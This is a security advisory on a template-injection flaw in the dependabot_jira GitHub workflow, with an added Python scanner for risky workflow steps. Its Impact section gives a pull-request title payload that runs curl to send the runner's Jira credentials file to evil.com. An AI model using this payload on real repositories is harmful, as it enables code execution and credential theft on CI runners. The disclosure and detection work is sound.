Summary
The GitHub workflow template in namin2/dependabot_jira repository is vulnerable to template injection from user comments.
Product
namin2/dependabot_jira repository
Tested Version
Master branch.
Details
Issue: Hidden expression expansion of input parameters passed to atlassian/gajira-create
The Create Jira Issue step in the dependabot_jira.yml workflow is vulnerable to template injection.
The ${{ github.event.pull_request.title }} expression is used to format input values to the atlassian/gajira-create action:
- name: Create Jira Issue
  id: create
  uses: atlassian/gajira-create@v2.0.0
  with:
    project: ${{ env.JIRA_PROJECT }}
    issuetype: ${{ env.JIRA_ISSUE_TYPE }}
    summary: |
      [${{github.event.repository.name }}] ${{github.event.pull_request.title }}
    description: |
      ${{github.event.pull_request.html_url }}
The action has a hidden feature: it expands {{ }} templates internally. As a result, when the pull request title contains an expression in double curly braces, that expression is evaluated by Node.js inside the action.
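The practical check a workflow maintainer wants here is to find every step that hands attacker-controlled GitHub contexts (pull request titles, issue bodies, comment bodies and the like) to an action that performs its own {{ }} expansion. The scanner below is an added example written for this advisory, not code from GHSL or the dependabot_jira project. It is line-based on purpose, so it needs no YAML library; the list of template-expanding actions contains only atlassian/gajira-create, as named in the report, and the embedded sample workflow is constructed from the step quoted above plus a hardened variant (an editorial suggestion, not the vendor's fix) that passes only GitHub-generated values such as the PR number and URL to the action.

```python
import re
from typing import Dict, List, Optional

# Actions whose `with:` inputs are expanded as {{ }} templates by the action
# itself (atlassian/gajira-create, per GHSL-2020-211). Extend only for actions
# you have confirmed behave the same way.
TEMPLATE_EXPANDING_ACTIONS = ("atlassian/gajira-create",)

# GitHub contexts that a pull request author or commenter controls outright.
UNTRUSTED_CONTEXT = re.compile(
    r"\$\{\{\s*(github\.(?:"
    r"head_ref"
    r"|event\.(?:pull_request|issue)\.(?:title|body)"
    r"|event\.(?:comment|review|review_comment)\.body"
    r"|event\.pull_request\.head\.(?:ref|label)"
    r"|event\.head_commit\.message"
    r"))\s*\}\}"
)


def _indent(line: str) -> int:
    return len(line) - len(line.lstrip(" "))


def split_steps(workflow_text: str) -> List[List[str]]:
    """Cut each `steps:` list into one list of lines per step.

    The leading "- " of a step is replaced by spaces so that every key of the
    step shares the same indentation.
    """
    steps: List[List[str]] = []
    current: List[str] = []
    in_steps, step_indent = False, None
    for line in workflow_text.splitlines():
        stripped = line.strip()
        if stripped == "steps:":
            if current:
                steps.append(current)
            in_steps, step_indent, current = True, None, []
            continue
        if not in_steps or not stripped:
            continue
        ind = _indent(line)
        if step_indent is None:
            step_indent = ind  # first list item fixes the step indentation
        if ind < step_indent:  # dedent below the items: the steps list is over
            if current:
                steps.append(current)
            current, in_steps = [], False
            continue
        if ind == step_indent and stripped.startswith("- "):
            if current:
                steps.append(current)
            current = [line.replace("- ", "  ", 1)]
        else:
            current.append(line)
    if current:
        steps.append(current)
    return steps


def _step_key(step: List[str], key: str) -> Optional[str]:
    """Value of a top-level key of the step (ignores same-named `with:` inputs)."""
    key_indent = _indent(step[0])
    for line in step:
        if _indent(line) == key_indent:
            m = re.match(rf"\s*{re.escape(key)}:\s*(.*)$", line)
            if m:
                return m.group(1).strip()
    return None


def _with_block(step: List[str]) -> List[str]:
    """Lines nested under the step's `with:` key."""
    block, with_indent = [], None
    for line in step:
        if with_indent is None:
            if re.match(r"\s*with:\s*$", line):
                with_indent = _indent(line)
            continue
        if line.strip() and _indent(line) <= with_indent:
            break
        block.append(line)
    return block


def scan_workflow(workflow_text: str) -> List[Dict[str, str]]:
    """Flag template-expanding action steps whose inputs interpolate untrusted contexts."""
    findings: List[Dict[str, str]] = []
    for step in split_steps(workflow_text):
        uses = _step_key(step, "uses") or ""
        if uses.split("@", 1)[0] not in TEMPLATE_EXPANDING_ACTIONS:
            continue
        for line in _with_block(step):
            for m in UNTRUSTED_CONTEXT.finditer(line):
                findings.append({
                    "step": _step_key(step, "name") or uses,
                    "action": uses,
                    "context": m.group(1),
                    "line": line.strip(),
                })
    return findings


# Constructed sample: the vulnerable step from the advisory, then a hardened
# variant (editorial suggestion) that passes only GitHub-generated values.
SAMPLE_WORKFLOW = """\
name: Dependabot to Jira
on: pull_request
env:
  JIRA_PROJECT: PLACEHOLDER_PROJECT
  JIRA_ISSUE_TYPE: Task
jobs:
  jira:
    runs-on: ubuntu-latest
    steps:
      - name: Create Jira Issue
        id: create
        uses: atlassian/gajira-create@v2.0.0
        with:
          project: ${{ env.JIRA_PROJECT }}
          issuetype: ${{ env.JIRA_ISSUE_TYPE }}
          summary: |
            [${{github.event.repository.name }}] ${{github.event.pull_request.title }}
          description: |
            ${{github.event.pull_request.html_url }}
      - name: Create Jira Issue (hardened)
        uses: atlassian/gajira-create@v2.0.0
        with:
          project: ${{ env.JIRA_PROJECT }}
          issuetype: ${{ env.JIRA_ISSUE_TYPE }}
          summary: "[${{ github.event.repository.name }}] Dependabot PR #${{ github.event.pull_request.number }}"
          description: |
            ${{ github.event.pull_request.html_url }}
"""

if __name__ == "__main__":
    for f in scan_workflow(SAMPLE_WORKFLOW):
        print(f"{f['step']}: {f['context']} flows into {f['action']} -> {f['line']}")
```

Run against the sample, only the first step is reported, with github.event.pull_request.title as the offending context; the hardened step, which uses the PR number and URL instead of free text, produces no finding. Point the scanner at real workflow files by reading them and passing their text to scan_workflow.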
Impact
This vulnerability allows for arbitrary code execution in the context of the GitHub runner. For example, a user may create a pull request with the title:
{{ process.mainModule.require('child_process').exec(`curl -d @${process.env.HOME}/.jira.d/credentials http://evil.com`) }}
which will exfiltrate the secret Jira API token to the attacker-controlled server. To make the attack less visible, an attacker may modify the title later.
Coordinated Disclosure Timeline
- 10/29/2020: Report sent to vendor
- 11/05/2020: Issue resolved
Credit
This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).
Contact
You can contact the GHSL team at securitylab@github.com; please include a reference to GHSL-2020-211 in any communication regarding this issue.